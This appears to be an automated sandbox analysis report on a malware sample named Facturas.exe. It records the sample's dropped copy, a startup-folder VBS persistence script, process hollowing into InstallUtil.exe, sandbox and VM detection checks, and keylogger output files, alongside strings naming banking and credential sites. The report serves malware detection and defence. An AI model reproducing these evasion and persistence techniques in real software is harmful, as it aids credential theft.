Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cdosys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mlang.dll	Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Facturas.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Facturas.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Facturas.exe

Static file information: File size 1189888 > 1048576

Source: Facturas.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x121e00

Source: Facturas.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1261777030.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: Facturas.exe, 00000000.00000002.1248872319.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2479512482.000000000043F000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1261777030.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Facturas.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: Facturas.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: Id.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: Id.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Facturas.exe.5b10000.6.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Facturas.exe.5b10000.6.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Facturas.exe.5b10000.6.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Facturas.exe.5b10000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Facturas.exe.5b10000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Facturas.exe.5b70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Id.exe.3e666f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1260940324.0000000005B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1411737595.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Facturas.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 7412, type: MEMORYSTR

Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_02D807B0 push esp; retf	0_2_02D807B1
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_06567B38 push dword ptr [ebp-17000000h]; retf	0_2_06567B3E
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_00E107B0 push esp; retf	13_2_00E107B1
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_05FE7B38 push dword ptr [ebp-17000000h]; retf	13_2_05FE7B3E

Source: Facturas.exe	Static PE information: section name: .text entropy: 7.991574593264377
Source: Id.exe.0.dr	Static PE information: section name: .text entropy: 7.991574593264377

Source: C:\Users\user\Desktop\Facturas.exe

File created: C:\Users\user\AppData\Roaming\Id.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\Facturas.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\Facturas.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Facturas.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 7412, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Facturas.exe	Memory allocated: 1490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: foregroundWindowGot 1652			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: foregroundWindowGot 1773			Jump to behavior

Source: WebData.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: WebData.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: WebData.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: WebData.2.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000C.00000002.1381728463.000001FA3E194000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: WebData.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW$M
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: WebData.2.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: WebData.2.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: WebData.2.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: WebData.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: WebData.2.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Id.exe, 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: WebData.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Id.exe, 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: wscript.exe, 0000000C.00000002.1381728463.000001FA3E194000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yE
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: WebData.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: WebData.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Facturas.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:17]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:18]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDatadMAuPpXP.txt.2.dr, KeyDatarxjoXUur.txt.2.dr	Binary or memory string: [03:13:50]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, KeyDatalMReqyDc.txt.2.dr, KeyDataMwoscjvf.txt.2.dr	Binary or memory string: [03:13:39]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:05]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, KeyDatalMReqyDc.txt.2.dr	Binary or memory string: [03:13:40]<<Program Manager>>
